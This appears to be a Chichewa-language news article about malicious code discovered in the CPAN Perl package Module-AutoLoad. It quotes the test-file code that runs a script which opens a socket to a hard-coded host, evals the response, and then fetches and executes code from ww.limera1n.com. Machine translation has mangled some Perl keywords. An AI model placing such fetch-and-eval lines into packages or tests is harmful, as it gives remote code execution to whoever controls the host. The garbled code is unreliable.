Pulogalamu ya ProHoster > Blog > nkhani zapaintaneti > Khodi yoyipa yapezeka mu phukusi la Module-AutoLoad Perl

Khodi yoyipa yapezeka mu phukusi la Module-AutoLoad Perl

Mu phukusi la Perl logawidwa kudzera mu bukhu la CPAN Module-AutoLoad, opangidwa kuti azingonyamula ma module a CPAN pa ntchentche, kudziwika malicious kodi. Kuyika koyipa kunali anapeza mu test code 05_rcx.t, yomwe yakhala ikutumizidwa kuyambira 2011.
Ndizofunikira kudziwa kuti mafunso okhudza kutsitsa ma code okayikitsa adabuka Stackoverflow kumbuyo mu 2016.

Zochita zoyipa zimafika poyesa kutsitsa ndikukhazikitsa ma code kuchokera pa seva ya chipani chachitatu (http://r.cx:1/) panthawi yoyeserera yomwe idayambitsidwa poyikira gawoli. Zimaganiziridwa kuti code yomwe idatsitsidwa koyambirira kuchokera ku seva yakunja sinali yoyipa, koma tsopano pempholi likutumizidwa ku domain ya ww.limera1n.com, yomwe imapereka gawo lake la code kuti aphedwe.

Kukonza download mu wapamwamba 05_rcx.t Khodi yotsatirayi imagwiritsidwa ntchito:

wanga $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
wanga $try = `$^X $prog`;

Khodi yodziwika imapangitsa kuti script ichitike ../contrib/RCX.pl, zomwe zili mkati mwake zimachepetsedwa kukhala mzere:

gwiritsani ntchito lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β€³};

Script iyi yadzaza osokonezeka pogwiritsa ntchito utumiki perlobfuscator.com kachidindo kochokera kwa wolandira wakunja r.cx (zizindikiro 82.46.99.88 zimagwirizana ndi mawu akuti "R.cX") ndikuzichita mu block block.

$ perl -MIO::Socket -e'$b= new IO::Socket::INET 82.46.99.88.":1β€³; sindikizani <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Pambuyo pomasula, zotsatirazi zimachitidwa: code:

sindikizani{$b=IO yatsopano::Socket::INET"ww.limera1n.com:80β€³}"GET /iJailBreak
";evalor return warrn$@while$b;1

Phukusi lavutoli tsopano lachotsedwa munkhokwe. Pumira (Perl Authors Upload Server), ndipo akaunti ya wolemba gawo yatsekedwa. Pankhaniyi, module ikadalipo zilipo munkhokwe ya MetaCPAN ndipo ikhoza kukhazikitsidwa mwachindunji kuchokera ku MetaCPAN pogwiritsa ntchito zina monga cpanminus. Iwo anatikuti phukusili silinagawidwe kwambiri.

Zosangalatsa kukambirana cholumikizidwa ndi mlembi wa gawoli, yemwe anakana chidziwitso chakuti code yoyipa idayikidwa pambuyo pa malo ake "r.cx" adabedwa ndikufotokozera kuti amangosangalala, ndipo adagwiritsa ntchito perlobfuscator.com kuti asabise chinachake, koma kuchepetsa kukula kwake. za code ndi kuphweka kukopera kwake kudzera pa clipboard. Kusankhidwa kwa dzina lantchito "botstrap" kumafotokozedwa ndi mfundo yakuti mawuwa "amamveka ngati bot ndipo ndiafupi kuposa bootstrap." Wolemba gawoli adatsimikiziranso kuti zosokoneza zomwe zazindikirika sizikuchita zoyipa, koma zimangowonetsa kutsitsa ndikuchita ma code kudzera pa TCP.

Source: opennet.ru

Kuwonjezera ndemanga